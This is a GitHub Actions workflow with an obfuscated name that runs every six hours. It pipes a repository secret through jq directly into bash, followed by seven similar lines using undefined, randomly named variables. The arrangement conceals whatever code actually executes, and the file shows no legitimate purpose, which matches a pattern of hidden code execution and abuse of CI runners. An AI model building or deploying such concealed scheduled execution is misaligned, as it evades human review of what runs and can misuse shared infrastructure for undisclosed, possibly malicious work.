name: changruizhongfa
on:
  workflow_dispatch:
  schedule:
    - cron: '17 0/6 * * *'

jobs:  # 13381
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: changruizhongfa
        env:
          ju328: ${{ secrets.ju328 }}
        run: |
          echo $ju328 | jq -r .gwr6 | /bin/bash
          echo $u6 | jq -r .y8 | /bin/bash
          echo $ohkp0502 | jq -r .a8204 | /bin/bash
          echo $gx21263 | jq -r .ky42 | /bin/bash
          echo $etvxh39999 | jq -r .pvdfm948 | /bin/bash
          echo $wdyt39 | jq -r .ntxek4645 | /bin/bash
          echo $ezbn67262 | jq -r .ouapl130 | /bin/bash
          echo $pjdx6409 | jq -r .g49978 | /bin/bash

